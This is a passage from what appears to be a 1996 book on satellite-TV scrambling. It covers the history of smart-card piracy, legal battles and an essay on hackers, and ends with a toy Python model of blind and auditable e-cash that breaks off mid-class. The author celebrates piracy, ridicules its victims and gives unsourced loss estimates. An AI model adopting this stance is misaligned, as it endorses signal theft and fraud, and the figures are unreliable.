1: An Introduction To Scrambling





The first law of magic is that chaos is order and order is chaos. This 
is a proven mathematical fact. It is also the first law of hacking. In 
order for the scrambled signal to be recovered, there has to be some 
sort of order in the scrambled signal. The more secure systems use 
digital techniques but despite their complexity, they are not 
ultimately secure. 


The fun or thrill of hacking is breaking a system that cost millions to
develop with a few pence worth of components. It is a common
fallacy that if the subscription cost of a system were reasonable,
hackers would not attempt to hack that system. This argument is
generally proposed by JAFAs. For those still wondering what JAFA
means, it is an acronym for Just Another F*%&ing Amateur.


Hacking is a game of technological chess and as with any sport 
nowadays there are amateurs and professionals. Luckily for the 
hackers the greater proportion of the system users are non-technical 
business people and hence by the above definition, amateurs. 


The information in the book should be equally valuable to system 
owners and to hackers. The system owner has the most to lose and 
the hacker has the most to gain. It will give the system owner access 
to information about hacking that he or she would not otherwise be 
able to obtain. It should also give the reader, regardless of side, a 
detailed knowledge of the practice of signal security. 


That was written in 1988. This is 1996. The market for satellite television
piracy in Europe is huge. It is a truly multinational effort, as the legal
framework is just not able to cope with this form of activity. While it is often
illegal to pirate a channel in the country from which it originates, any
foreign channel is fair game. The channels who are the victims often have
neither the will nor the legal grounds to act against this piracy. When channels
do take legal action outside their home market, once the laughing dies
down, the realisation of abject failure dawns upon them. The handling of the
problem lies not in the lawyer's remit, but rather in the hands of those who
select the system.


It is estimated that the Blackbox industry in Europe is worth at least £500
million per year in trade. Minor constraints such as national borders do not
affect this industry. So in a situation like that of BSkyB, which only holds the
rights for Ireland and the UK, the pirates can market the service Europe-wide.
Channels like FilmNet, Rendezvous, Canal Plus and TV1000 have a
translingual appeal - hardcore pornography. Therefore they are pirated in
every market.


Of course there are some, primarily working for the afflicted channels, who
would question the figure of £500 million. The simplest way to check it is to
take the piracy of the BSkyB 09 card as an example. The first fully operational
pirate 09 smart card appeared in October 1994. BSkyB switched to the 10
card (0A to hackers, from its hexadecimal issue number) on 31/10/95.
Therefore there was approximately a year of complete piracy on the 09 card.


The main targets on the 09 card were the Sky channels. This resulted in a 
subscription to the value of £287 being lost by BSkyB. Also on the same 
pirate card were, The Adult Channel (a UK soft porn channel) and Eurotica 
(the hard core version of the Adult Channel). This pushed the value of the 
lost subscriptions to approximately £387. 


Considering there were at least 500,000 pirate devices in the UK and 
Ireland at the height of the 09 piracy, this would give a piracy value of 
£193,500,000 for that year. Of course you are not going to find the channels 
declaring such a loss to piracy. It would not be good for their business. 
Naturally since these figures can never be properly assessed, it is difficult to 
get any reliable answer. The problem is that the media analysts who review 
the stocks generally haven't a clue about piracy. The fact that only a limited 
amount of the stock is in play at any given time produces an artificial view of 
the situation. 


At the time of writing, late July 1996, the Sky 10 card has been hacked and
pirate devices are once more flooding into the market. This time, the hack is
limited to Battery Cards and has not been released in PIC16C84 based
cards. The Battery Cards use the Dallas DS5002FP secure microcontroller,
which has proven to be more robust than the majority of the secure chips on
the market.


Of course it should be remembered that BSkyB ran their first public Pay Per 
View event on March 17th, 1996. Even this was hacked as someone found 
a backdoor into the card that allowed the PPV event to be enabled on 
legitimate BSkyB cards. While this was separate from the actual Battery 
Card hack, it does bode ill for any future PPV event that BSkyB want to run 
using the 10 card. A future PPV event would be compromised by both an 
activator hack and by the Battery Card hack. 


The advertising of pirate devices in Europe has changed little over the last
two years. Pick up some European satellite television magazines and
you are likely to run across adverts for pirate smart cards or decoders
before you get to any articles. Magazines published in the UK such as
“Satellite TV Europe” and “What Satellite” even carried advertisements for
pirate BSkyB cards. It could be argued that these magazines exploited the
pirate card market for the last few years. Indeed the current European
Commission green paper on the protection of encrypted services referred to
this exploitation of the piracy industry. Specifically, the green paper mentions
that these magazines should not be hit for providing an advertising medium
for pirate devices.


In September 1995, “What Satellite” apparently developed moral qualms about
advertising BSkyB-capable pirate cards. Either that, or BSkyB's legal people
convinced them of the error of their ways. For a magazine that depends on
BSkyB's television schedules, they had a lot to lose by not taking notice.


“What Satellite” issued a letter to their pirate card advertisers stating that 
they would not advertise pirate BSkyB cards anymore and all new card 
adverts would have to specify which channels were decoded. This of course 
was very convenient timing as the switch to the Sky 10 card happened on 
31/10/95. 


Over the lifetimes of the 07 and 09 hacks on BSkyB, the level of piracy was
such that the legitimate channels were not able to prosecute all of the
pirates even when the legislation was on their side. Sharon Southwell-Gray,
the Deputy Head of Legal and Business Affairs for BSkyB, even admitted that
such a situation existed with the 07 piracy in an affidavit given to the UK
High Court in a case against a distributor of blockers. This revelation was a
surprising glint of reality-based lucidity, falling as it did on an industry jaded
by content-free press releases.


Perhaps the reason that the Blackbox Industry thrives is stupidity. The 
stupidity lies mainly in the policies of the management of the channels under 
attack. 


Of course it is a sweeping generalisation to say that all channels are 
similarly afflicted. Some channels take the matter of piracy seriously and 
have plans to deal with the eventualities. Perhaps "eventualities" is the 
wrong word. It doesn't convey the uncertainty of imminent doom. 


In the last few years, most channels have been trying to fight piracy with
varying effect. Some have handled the whole issue with such
cack-handedness that it amazed nobody, except the channels, when the
cases against the pirates collapsed.


Admittedly each scrambled channel is in an almost indefensible position.
They cannot employ military grade security and algorithms in their
scrambling systems - the military will not let them. The legislation extant in
the areas where they are most pirated does not offer them protection. Their
systems are based on architectures that are often five or more years out of
date, and the technology has advanced sufficiently to allow hacks on the
aspects that were virtually unhackable five years ago.


Therefore it would be logical to design any future system so that it can
recover from a hack. The ability to recover from a hack matters more than
resistance to one. Trying to make a system hackerproof, or indeed
pirateproof, is a futile exercise.


As can be seen from the recent events in the Blackbox industry, the
progress of electronics has a devastating effect on the security of systems.
The SECAM version of the Nagra Syster scrambling system has been
hacked by an attack on the video scrambling technique itself. This attack,
while known about for at least five years, was until recently neither
economically nor technically viable.


The operational lifetime, or more precisely the hack-free period, of a system
is now less than five years. It varies with the number of hackers going after
the system. Thus for a sporadically used system there may be very little
risk of the system being hacked. For a widely used system, of course, a hack
is inevitable.


There are some people who would prefer that the Black Book did not exist. 
In fact at one conference on piracy prevention a speaker asked how they 
could stop the Black Book from being published since certain sections 
appeared to be against UK law. The smart retort would have been to tell 
them to make more secure systems but the reality cuts deeper. Well, that 
and the fact that this book is not published in the UK. 


A scrambling system is like a very high stakes poker game. If the channel is
bluffing about its scrambling system then it will lose millions. Most of the
systems that are coming on to the market are actually fairly secure. It is the
small design flaws that allow them to be hacked.


The Black Book has become the “bible” of scrambling systems. It seems
that the book is often consulted to find the characteristics of a scrambling
system by both channel executives and hackers. Apparently the
manufacturers of the systems rarely supply interesting data sheets; the only
other source is vague patents, and then you have to go looking for the patents.


Some manufacturers adopt the “Mushroom Strategy” with users of their 
scrambling systems. They keep the users in the dark and feed them on the 
stuff that mushrooms are fed on. Some of these manufacturers would have 
a stunning second future in agriculture ahead of them. 


This strategy is more politely referred to as “Security By Obscurity”. In all
cases where this approach is used, the system is hacked. The designers 
frequently believe that they are cleverer than the hackers and therefore the 
hackers could not break their system. There is no sight as pathetic as the 
designer who is blinded by his own brilliance. There is nothing funnier than 
someone who is not in possession of all the facts trying to defend this 
strategy. Sometimes you have got to wonder if the Mushroom Strategy is an 
alternative name for Catch-22. 


The Mushroom Strategy also has more dangerous implications when the
system is hacked. By its very nature, it is impossible to brief the
counter-piracy team assigned to limit the damage. It seems the next big
operation to use the Mushroom Strategy will be the Digital Video
Broadcasting project.


The DVB project is meant to provide some form of common platform for
digital television broadcasting in Europe. The system will use a Common
Scrambling Algorithm for the base level encryption. Each vendor can then
add his own access control architecture. The Common Scrambling Algorithm
will not be disclosed but will be given to each member of the DVB project by
a custodian after non-disclosure agreements have been signed. Yeah, right! I
am not sure what genius came up with this idea. The DVB actually has a
plethora of committees of all sorts of experts except one on how to make
the coffee. The words “Tower Of Babel” spring to mind. They even have a
committee of experts on piracy. The only thing, it seems, that these experts
are expert on is developing systems that keep getting hacked!


The question now relates to whether the DVB systems will be hacked. 
Perhaps it is only a matter of time, but the lessons of the past may have 
been learned and integrated into the DVB specifications. But even if the 
security on the DVB is not as good as it could be, there may be some 
Europe-wide laws to protect this colossal folly. 


The implementation of pay television legislation in Europe has been nothing
short of a complete disaster for the channels. To put it bluntly, if a service is
hacked, it has no viable protection under the law. Lawyers cannot repair
a breach of security, but most of those in the satellite television business
seem to believe that they can stop the pirates exploiting that breach.


In Europe there is no coherent Europe-wide legal framework for dealing with 
piracy - yet. It is generally a case of each country protecting its own 
channels or channels that uplink from their country. 


There is legislation afoot to change the face of piracy in Europe. The 
European Commission published a green paper in March that seeks to deal 
with the legal protection of encrypted services in the EU. Of course it seems
that the same crowd responsible for the fiascoes of the past have been let 
loose again to wreak havoc with more bungled legislation. Not exactly the 
Dogs Of War, more like the shi-tzus of waffle! 


This new European legislation, should it follow the format outlined in the
European Commission green paper, will make piracy of encrypted services
illegal throughout the European Community. The channels seem to consider
that legislation will, in itself, be enough to stop piracy. However, this is due
more to a faulty understanding of what legislation is meant to achieve than
anything else. Legislation does not exist to stop crime. Specifically,
anti-piracy legislation does not exist to stop piracy. It exists to provide
remedies for the victims.


The problem for those who would enact such legislation is the
incompetence and inabilities of the channels. It is the channels that have a
duty to protect their service. Normally this is effected by using encryption and
scrambling. Any government, when approached by a channel, will want to
see proof that the channel is protecting the signal. It is not in the
government's interest to waste taxpayers' money protecting the channel
against piracy when the system was hacked because of the channel's
incompetence, ignorance and ineffectiveness.


If a channel wishes to have the protection of legislation, then it should go 
some of the way towards actually using a scrambling system that is not 
easily hacked. Some form of independent certification of scrambling 
systems to be used in Europe would therefore be a good thing. The current 
trend of relying on non-disclosure, otherwise known as security by obscurity, 
is not viable and plainly allows the implementation of rather mediocre 
scrambling systems. It is not just a question of the law protecting the 
channels. It is a question of why the law should be used to protect a 
company that cannot be bothered to protect itself. 


In the European Commission's green paper, there are references to the 
anti-piracy recommendations from the Digital Video Broadcast project. 
What worries me is that some of the phrasing in the legislation proposed in 
the DVB recommendations is, in some respects, particularly clueless and 
plainly ignorant of reality. 


These people refer to the criminalisation of the possession of pirate digital
decoders. The problem is that most of the major piracy in Europe for the last
few years has been based on pirate smart cards. Of course, when one of the
proponents of the Council of Europe legislation was questioned on this, he
pointed out that the phrase "pirate decoders" also refers to pirate smart
cards. The image of the “Blessed Are The Cheesemakers” scene from
Monty Python's “The Life Of Brian” sprang to mind.


At the time of writing, the European legislation has still to be resolved. It is 
difficult to be optimistic about the situation given the past performances. It 
seems what the lawyers and bureaucrats would like is a legal framework not 
unlike the US model. Of course here in Europe, the US model would not be 
effective without a police state apparatus. No doubt some of the people 
advising the European Commission and the Council Of Europe would wish 
for such a situation. 


Even in America, land of the brave and home of the fee, magazines carry 
adverts for the monthly codes for VideoCipher and B-MAC. Now with the 
collapse of the DSS smart card security, they carry adverts for pirate DSS 
smart cards marketed from outside the USA. With the US legal system, 
you've got to be insanely brave or stupid to be in the US Blackbox industry. 
Most DSS pirates are operating outside of US jurisdiction. 


It is interesting to speculate on the future of piracy in Europe. With the 
imminent legislation, it will probably be illegal throughout the European 
Community to sell, manufacture, import or use pirate devices. But will that 
stop piracy? The answer has got to be a resounding no. The USA has some 
of the toughest anti-piracy legislation in the world and it also has one of the 
biggest piracy problems. 


So Why Does Piracy Happen? 


1. Channel Not Legitimately Obtainable 


Though the channel can be received in a geographical area, the politics and 
legalities of the situation may prevent people from subscribing. The main 
problem is copyright. 


The programme producers can make more money out of selling the same 
product to a large number of small copyright areas than to one large 
copyright area. This becomes more apparent when the copyright areas are 
multilingual. Each linguistic territory generally has its own broadcast 
services. For example, BSkyB covers the primary English language market 
and Premiere covers the primary German language market. 


With analogue systems, for a service to feed more than one linguistic
market would require either additional audio subcarriers or teletext
subtitling. A more costly alternative is a separate service for each area.


With the emerging digital services, extra audio channels are less of a
problem. All that is left is the legal problem. As the channel contracts with
the programme provider to only sell in the designated area, the channel is
not meant to sell outside of that area. The programme provider will probably
have a contract with another channel for that area. Therefore any potential
subscriber outside of the channel's designated copyright area cannot legally
subscribe to the channel.


Above all, the copyright issue is the one issue that creates the necessary 
conditions for piracy. It is logical to say that most of the market for pirate 
cards and decoders would disappear if there was a unified copyright area in 
Europe. This is sometimes referred to as a footprint based copyright area 
as opposed to a linguistic or national copyright area. Whether the piracy is in 
the Grey Market form or Black Market depends on the legal framework and 
whether the demand can be supplied by Grey Market piracy. 


2. Programming Not Available 


If someone is told that they cannot have something, they then want it. It is a 
flaw of Human nature and television is one of the most powerfully addictive 
drugs known to Mankind. 


The best example of this is the hard core pornography situation in the UK. It 
is not possible, in the UK, to subscribe to a UK hard core pornography 
channel for the simple reason that there are none. 


A hard core pornography channel would not be granted a licence from the
UK's regulatory commission. This is not surprising, as most seem to
consider that those who make up this commission are totally
unrepresentative of the people in the UK, and some even consider them to be
completely clueless. As a direct result, the channels carrying hardcore
pornography such as FilmNet, TV1000, Canal Plus and Rendezvous have an
avid viewership in the UK. The quasi-legitimate Grey Market cards are very
much in the minority, as the scrambling systems used on these channels are
compromised.


3. Programming Too Expensive 


Would you pay for a movie channel that shows mainly back-catalogue 
movies with the odd recent release? The odd recent release is of course a 
movie that you saw on video three or four months earlier. If you answered 
"no" then you probably do not subscribe to any of the movie channels. 


The sad fact is that many of the movie channels available only run movies
three or four months after they are released on video tape. The movie
channels pad the running list by loading it with back-catalogue movies and
showing the main movie two or three times each day. Under closer
examination, the movie channel's claim of replacing the video rental store
falls apart. When the viewer has already seen the vast majority of the movies
on video, or indeed on terrestrial television, the subscription fee begins to
look expensive.


At the time of writing, a typical weekday running list consists of movies from 
1947, 1956, 1994, 1986, 1980, 1984, 1994, 1994, 1993, 1994, 1994, 1993, 
1994. This is being written in May 1996. The oldest movie being shown on 
Sky Movies is nearly fifty years old and the most recent is two years old. 


Marketing people love to quantify and classify people. The target market for
the movie channels is that comprised of the people with a lot of
disposable income, the ABC1s as they call them. Unfortunately for the
movie channels, the ABC1s are too busy making and spending their money
to subscribe. As a result, the movie channels have to target people with less
disposable income.


The harsh reality is that the ideal movie channel viewer is someone with a 
lot of time on his or her hands. The only people who would fit that 
description are retired, rich or unemployed. They all get the movies on a 
more timely basis from the video rental shop. 


The Three Phases Of Piracy 


In most situations, piracy on a channel moves through three distinct phases. 
In some respects, these follow the growth of hacking knowledge about the 
system. 


1. Card Scams And Grey Market Operations 


The first stage of piracy on a channel consists of card scams and Grey
Market operations. While at this time there is no viable pirate device on the
market, there is still a large demand. The obvious method of fulfilling this
demand is to redistribute the subscriptions. The other term for this
redistribution is a Grey Market operation.


The trend towards smart card based systems has made Grey Market piracy
easier. Whereas with an Embedded Secure Microcontroller based system
there is a decoder to be shipped, a smart card based system only requires a
smart card to be shipped, because it is often easy to acquire a decoder
even outside the copyright area. The classic example of this is the
D2-MAC EuroCrypt system, where decoders are available Europe-wide
even in areas where there are no D2-MAC channels in operation.


A subscription is taken out in the legitimate copyright area and then the
decoder or smart card is shipped to the person really paying for the
subscription. The end user is outside the copyright area and cannot
legitimately subscribe. The Grey Market is where both the channel and the
user benefit. The channel gets a subscription that looks legitimate and the
user gets access to the programming. It is only the lawyers who whinge at
this arrangement.


There is a darker side to this. Often, in a move to bring in subscribers a 
channel will engage in Quickstart marketing. This scheme makes it possible 
for someone to walk into a shop, sign a subscription form and walk out with 
a card. The card is activated shortly afterwards. However when BSkyB ran 
such an operation, there were a lot of cards obtained by this method with 
false details and addresses. Some of these addresses showed real 
imagination - railway stations were popular. Most of these cards ended up in 
Europe. 


It is estimated by pirate sources monitoring Sky's over the air traffic that
some one million Quickstart cards were acquired in this manner over the
lifetime of the 09 card. However, in this phase the Quickstarts only last for
a few weeks at best. The real damage caused by the Quickstart marketing
programs does not become apparent until the second phase.


2. Activators And Blockers 


As the knowledge about a system increases, one of the first things that 
hackers learn is how to activate smart cards. From there it is a short step to 
learning how to block the kill signals. 


The term for this operation is a Phoenix operation. Named after the mythical
bird that renews itself, it is perhaps more damaging than an outright
pirate device. It marks the point where the pirates take over the channel's
access control system.


Some limited options will be available to the channels. They may be able to
reduce the number of pirated official cards in circulation by drop-dead
ECMs (electronic countermeasures). However, at this stage, the demise of
the card is imminent.


3. Viable Pirate Devices 


In this phase, the card is hacked and the pirate smart cards filter into the
market. The rate at which they appear is slow at first but quickly turns into a
flood. This again is related to the nature of the Blackbox industry. The
information and data required to produce the pirate card is sold on down the
line.


When the pirate cards appear, the first reaction of the channel is to 
implement ECMs. For example, in the last few months of the Sky 09 card, 
ECMs were occurring every few weeks. The effect on the pirate cards was 
minimal. 


The only thing that will solve the problem at this stage is an issue of new 
smart cards. It is faulty logic that ECMs will stop the piracy. The information 
required to produce a viable pirate card includes an operational knowledge 
of the official model. Therefore the hackers and pirates would be able to 
figure out the ECM within a very short time. This coupled with the updatable 
nature of the pirate cards on the market makes an ECM an extremely 
temporary matter for the pirates. 


The Channels Strike Back 


The hacker scene is currently reeling after a series of raids and court cases
around the planet. In North America, News Datacom and DirecTv have filed a
civil suit against 22 named defendants, alleging that these people were part
of a conspiracy to hack the DirecTv access control card and distribute the
hacked versions. The suit is aimed at people in four jurisdictions: USA,
Canada, Grand Cayman and Bermuda. This casting of a wide jurisdictional
net may bring problems.


It is not yet known how much force a US court action has against people
living and operating in another jurisdiction. However, some sources have
said that the US proceedings may be transferred to Canada as part of the
NAFTA trade agreement. The hackers and pirates situated in the islands
may be somewhat safer unless they go to the USA. If they do go to the USA
they would be classified as “fugitives from justice” and would be liable to
arrest.


The fact that News Datacom and DirecTv had to resort primarily to civil law
shows just how uncertain the whole legal situation surrounding DirecTv is.
The law suit alleges that the named defendants were in violation of the
RICO (Racketeer Influenced and Corrupt Organizations) statutes and the
Lanham Trademark Act. The RICO statutes are more typically used against
organised crime and drugs traffickers. The trademark legislation is also
more typically used against people manufacturing counterfeit devices and
passing them off as the real thing. The pirate cards, however, have not
apparently been passed off as the real thing, but there is a deeper worry
here for DirecTv and News Datacom.


The latest attack on the DirecTv system is the Phoenix program. Normally
the Phoenix is the first hack on a smart card based system and is a 
precursor to a general collapse of security. However the DirecTv situation is 
different to the European one. The DirecTv hack is still in its first generation 
and the main profits were to be made from pirate battery cards. This is the 
path that the hack has followed. Now with the Battery cards becoming 
commonplace, the Phoenix hack seems to be the next major attack. 


DirecTv have, in a press statement issued covering the court action, stated 
that they will be changing their smartcards over to the new issue beginning 
in August. This ties in nicely with an October switchover though given the 
geographical and logistical expanse that is the United States, the actual 
switchover may be delayed until November or December. It is beginning to 
look as if News Datacom and DirecTv are engaging in that tactic that we are 
familiar with here in Europe - counter-piracy by press release. 


In Europe, there have been some raids of varying success and of similar
effect. The main European pirate company Benedex was raided by France
Telecom and Canal Plus on the basis that the company was behind the
D2-MAC EuroCrypt piracy. While the company was a major player, it soon
turned out that it was not exactly responsible for the piracy. TV1000 and
FilmNet upgraded their keys in an attempt to hit the pirates. The upgrade
has become known as the “Natural Born Idiots” upgrade. FilmNet and
TV1000 were about to show the Natural Born Killers movie and had decided
to hit the pirate viewers in Ireland and the UK by changing keys. The movie
is banned in Ireland courtesy of the somewhat stupid and anachronistic film
censors. As a writer, I would like to regard censors and critics in the same
light, preferably that of a laser targeting 'scope. In the UK, the movie has not
been given a video release yet. The new keys were available within hours,
proving that the move by FilmNet and TV1000 was exactly that of a bunch
of idiots - the only thing that they succeeded in doing was swelling the bank
accounts of the pirate card manufacturers.


Sky, News Datacom, and apparently their security consultancy Network 
Security, were busy as well. This time they were operating way out of their 
jurisdiction in Germany. They had tried to set up some German hackers and 
pirates. In an effort to entrap them they tried to purchase the software for 
activating the Sky 10 cards. Then the hackers got raided by the German 
police the next day. Of course the German prosecutor was, allegedly, less 
than happy when he found out that Sky had no right to collect subscriptions 
in Germany. 


Sky have been busy elsewhere as well. In Ireland, it seems that they have 
taken the Megatek operation out of the game. They got an Irish High Court 
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judge to grant an order against Megatek preventing them from trading and 
also a Mareva order preventing Megatek from reducing its assets in the 
jurisdiction below £200000. In the UK, the Federation Against Copyright 
Theft, FACT, moved against Chris Cary’s operation. The warrant was 
executed by the police and apparently News Datacom people were in 
attendance. The move was, however, questionable. Further enquiries made 
by a journalist to the FACT received some strange responses. FACT, it 
transpired were almost clueless on the issue of satellite television piracy 
and were generally more inclined to be pursuing video tape piracy. The 
move to satellite television piracy was a strange one. However if you 
examine the terms under which an Anton Piller order is granted in the UK, 
things begin to make sense. One of the things that an Anton Piller order 
cannot be used for is a search of premises to see what charges can be laid 
against the defendant in the future. In other words it cannot be used as 
permission for a fishing expedition. The legal reference is [Lawton L.J.; 
Hytrac Conveyors Ltd Vs Conveyors International Ltd. 1983. F.S.R. 63, page 
70]. 


This matter has yet to be settled. The Megatek situation also has to be 
resolved. In terms of piracy on VideoCrypt, the main players it seemed were 
Benedex and Megatek. With these companies out of the scene, Sky and 
News Datacom could claim that they have achieved a measure of success 
against Sky 10 pirate cards. However the best is, perhaps, yet to come. It 
could force matters into a situation where the information to build a pirate 
Sky 10 card is dumped on to the open market. It has not visibly stopped the 
supply of pirate 10 cards and now Phoenixed 10 cards are beginning to 
appear. 


Sky and News Datacom were too stupid to realise that the situation 
regarding piracy was actually under control. There was no SEASON hack 
on Sky 10. There was no PIC16C84 hack on Sky 10. There was only the 
Battery card hack and that was in the region of £200. As such it was too 
expensive for most of the would-be pirate viewers in the UK. It was 
effectively catering for viewers outside the copyright area. Of course it was 
all relatively high profile. 


Had these people any understanding of counter-piracy, they would have 
realised that having an acceptable low level of piracy is preferable to a 
situation where there is widescale piracy. It is like the thought processes of 
those involved operate in black and white - a thing is either right or wrong. 
The real world is a series of compromises. Rather than the clarity of black 
and white things exist in levels of grey. 


Perhaps it is a case of sheer desperation on the part of News Datacom and 
Sky. They have resorted to the use of civil law as opposed to criminal law to 
attack people. Their move against the DSS hackers and pirates mirrors the 
moves they have made in the UK and Ireland. Will they be successful? It is 
too early to tell. They have made some inroads against the distribution of 
the pirate devices in North America and Europe. But the problem of piracy 
on the services still remains. If anything they have moved the pirate industry 
a step closer to the next generation of SEASON hacks. If this type of hack 
appears then it is going to cripple any service that is attacked. It seems that 
like sharks with the scent of blood from a wounded prey, hackers and 
pirates will be going after News Datacom protected services first. 


Hacking: The Battle For Dominance 


Hacking seems to be a form of evolution where the technically proficient are 
beginning to take over. The previously dominant group in modern 
society, the lawyers and politicians, have in general been slow to grasp the 
ramifications of technology. Hackers have not. Indeed it could be argued 
that hackers are the biological embodiment of the process of evolution. 
Some of the lawyers and politicians on the other hand are living fossils. 
Their evolution moves at the same pace as light trying to escape from a 
black hole. The immediate response from the lawyers and the politicians is 
that they try to rein in the hackers with the tools and chains that they know 
best - legislation. 


Some legal philosopher once described America as a society of laws. This 
of course could be applied to any democracy where there is a constitution 
and bill of rights. But more importantly, the description is wrong. A society is 
essentially a set of people with some shared objectives. In that set of people 
there will always be some group scrabbling for dominance. 


For the last few hundred years, the group that had dominance over the 
society were the lawyers and politicians. They had, on the surface, the best 
interests of the society in mind when drafting the legislation and rules. The 
reality was that their real motives had degraded in the cold light of day to the 
perpetuation of their position and control of society. 


Such a hierarchy was effective in a pre-industrial and industrial society. 
These were societies where things like capital punishment were common. 
That perhaps is a key to the understanding of this hierarchy. The purpose of 
capital punishment is not to exact some retribution but to terrify. It was 
intended to terrify the other members of the society by showing them just 
how nasty and terrible the law can be. Fear, here, is the key. 


When people started to lose their fear of lawyers and politicians, the society 
changed. The common images of the drink sodden senile judges, the slimy 
ambulance chasing lawyers, the pervert politicians demonstrate how far 
modern society has come. Some would argue that these images have 
always existed. 


The old saying that whom the gods would destroy they first make crazy could 
be upgraded for today. The new saying would be those who have to be 
destroyed are first made into figures of hate and distrust. It is of course 
made easier by the fact that the perception is that lawyers and politicians 
have become detached from society as a whole. They have become 
isolated. 


This lack of fear coupled with the move from an industrial society to an 
information society has amplified the problem for the politicians and 
lawyers. Their powerbase has been, and continues to be eroded. 


Of course some of these lawyers and politicians will not go quietly into this 
brave new interconnected world. The best example of the politician’s death 
rattle, in the United States, was the Communication Decency Act. It is the 
product of minds ignorant and incapable of the task. It is meant to impose a 
specific set of moral standards on the internet. The internet is far beyond 
their little minds and far beyond the confines of any one country. It is a 
construct of the mind and, in some respects a global image of the mind. 
However the people who came up with the CDA are lacking in one major 
respect - they cannot understand that which they are trying to legislate for. 
And you probably thought I was going to say that they lacked minds. 


The problem that the politicians and lawyers now face is a society where 
power is becoming redistributed. It is something that they are not used to 
and they do not seem to know how to react. The first stage of this change in 
the structure of society was the proliferation of the personal computer. The 
second stage was the internet. With the internet, there are no national 
boundaries and paper laws are frequently ignored. 


To a hacker, it is difficult to respect a politician or a lawyer. These people 
are paid to lie. Hacking, at the most basic is dealing with truth. An equation 
is either true or false; a bit is either one or zero. Such simplicity, however, 
rarely translates to the realm of the politicians and lawyers, or indeed to the 
real world. 


Perhaps the most terrifying thing in all of this is that the modern society, with 
the constitution and bill of rights is an illusion. It never really was a 
democracy. Democracy died a long time ago. It did not collapse howling in a 
sea of blood and flame. It died so slowly and silently that few noticed. It was 
strangled by rules, regulation and legislation. 


So what has wrecked this status quo? For the answer, we have to look at 
the history of printing. Prior to Gutenberg’s invention of movable print, books 
were rare. The Church had a virtual monopoly on the production of books 
and therefore by default, on the production and dissemination of information. 
As the Church must have known, when you control the flow of 
information, you control what people think. Gutenberg's movable typeface 
smashed that monopoly to such an extent that the Church never again 
re-established control. The personal computer is the modern equivalent of 
the invention of movable type. With the personal computer and the internet, 
man is no longer an island - he is a virtual media emperor. 


The hackers altered the balance of power a long time ago. While lawyers 
were wasting their time in law school, hackers were laying the foundations 
of the modern interconnected society. Above all, hackers were involved in 
establishing new ways of distributing and using information. 


One of the most vulnerable sections of society to a change in the way 
information is distributed and processed is, not surprisingly, the law. It is a 
system of rule-based inference and carefully structured bureaucracy. The 
people in this structured bureaucracy have such wonderful rituals designed 
to enforce the whole concept of hierarchy. 


In an information based society, those who control the information have the 
power. The reason that law appears to be so complex is because it is simply 
made to appear that way. The rather arcane method of speech where 
lawyers use phraseology more at home in the seventeenth century is meant 
to impress with pompous verbosity. The particular strength of good lawyers 
is that they can take a case and know the relevant rules applicable and 
other cases where these rules were applied similarly. Now how much faster 
would a properly programmed computer derive the same information? 


Of course in any society, there is an even more vulnerable part of the 
dominant group - the financial sector. It is improbable that the triumvirate of 
politicians, lawyers and financiers could really exist without each other. All of 
these sections are vulnerable to the hacker but, more importantly, the 
damage that hackers can wreak in an information society is astounding. 


With the move towards electronic cash and electronic funds transfer, there 
are more opportunities for those who would subvert the system. And who 
knows better how to subvert a system than a hacker? Of course the quick 
retort would be the system designer. 


A central element of the cashless society will be the smart card or electronic 
purse. There are, believe it or not, some people who still consider smart 
cards as being secure enough for this type of application. Now the same 
arguments were used to promote the use of smart cards on satellite 
television scrambling systems and where has it got these systems? This is 
the point at which things become grey, hidden in the twilight zone between 
satellite television piracy and real crime. Admittedly there are some who 
would find no difference between the two. 


The fact that smart cards are not secure means that a cash or funds 
transfer system that is based on smart cards is exceedingly vulnerable to 
hackers and commercial pirates. The expertise is there to hack the cards. 


Now of course it is only a matter of time before there is some hack on the 
newer generation of electronic cash cards. The stored token types as used 
for telephone call cards and other trivial applications are totally compromised 
at this time (see Chapter 4). 


The types I am referring to are the Mondex type applications where each 
card can store a number of credits that are effectively cash and can be used 
as such. 


There is a big difference between the electronic version of cash and real 
cash. Real cash is a tangible element. Electronic cash is not so tangible but 
the smart card is. 


There are basically two types of electronic cash schemes; blind and 
auditable. In the blind scheme there is a finite amount of electronic cash 
credits in circulation regulated by the service provider. However the service 
provider can validate each transaction as being authentic without knowing 
the identities of the parties. 


The auditable scheme is more reliable in that the service provider can 
authenticate each transaction and will have an audit trail which can be used 
to identify the parties involved. 
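

The two schemes just described can be made concrete with a small model. What follows is an added illustration, not from this book and not any deployed scheme: it assumes a Chaum-style RSA blind signature for the blind scheme (the text names no particular construction) and a plain signed ledger for the auditable one. The RSA parameters (p=61, q=53), the account names and the token values are constructed toy inputs; a real system would use large keys and sign a structured, hashed token rather than a raw number.

```python
"""Toy model of blind versus auditable electronic cash (constructed example).

Issuer key: textbook RSA parameters n = 61*53 = 3233, e = 17, d = 2753.
These are far too small for real use and the raw signature has no message
structure; the point is only to show what each issuer can and cannot learn.
"""
import random
from math import gcd

N, E, D = 3233, 17, 2753   # e*d = 46801 = 15*3120 + 1, phi(n) = 3120


def rsa_sign(x: int) -> int:
    """Issuer's raw RSA signature on an integer below N (toy)."""
    return pow(x, D, N)


def rsa_verify(x: int, sig: int) -> bool:
    return pow(sig, E, N) == x % N


class BlindIssuer:
    """Blind scheme: the issuer signs blinded tokens, so it can cap the
    number of coins in circulation and refuse a coin spent twice, but its
    withdrawal log never contains the token that is later deposited."""

    def __init__(self, cap: int):
        self.cap = cap
        self.withdrawals = []      # (account, blinded value): all it ever sees
        self.spent = set()

    def withdraw(self, account: str, blinded: int) -> int:
        if len(self.withdrawals) >= self.cap:
            raise RuntimeError("issue cap reached")
        self.withdrawals.append((account, blinded))
        return rsa_sign(blinded)

    def deposit(self, token: int, sig: int) -> bool:
        if not rsa_verify(token, sig) or token in self.spent:
            return False
        self.spent.add(token)
        return True

    def identify(self, token: int):
        """Try to link a deposited token to an account. Always returns None,
        because the log holds blinded values only."""
        return next((a for a, b in self.withdrawals if b == token), None)


def blind_withdraw(issuer: BlindIssuer, account: str, rng: random.Random):
    """Holder side: choose a token, blind it with r^e, get it signed, unblind."""
    token = rng.randrange(2, N)
    while True:
        r = rng.randrange(2, N)
        if gcd(r, N) == 1:
            break
    blinded = (token * pow(r, E, N)) % N
    blinded_sig = issuer.withdraw(account, blinded)
    sig = (blinded_sig * pow(r, -1, N)) % N   # (t*r^e)^d * r^-1 = t^d mod N
    return token, sig


class AuditableIssuer:
    """Auditable scheme: the issuer signs the token in the clear and keeps a
    ledger, so every deposit can be traced to the withdrawing account."""

    def __init__(self):
        self.ledger = {}           # token -> account
        self.spent = set()

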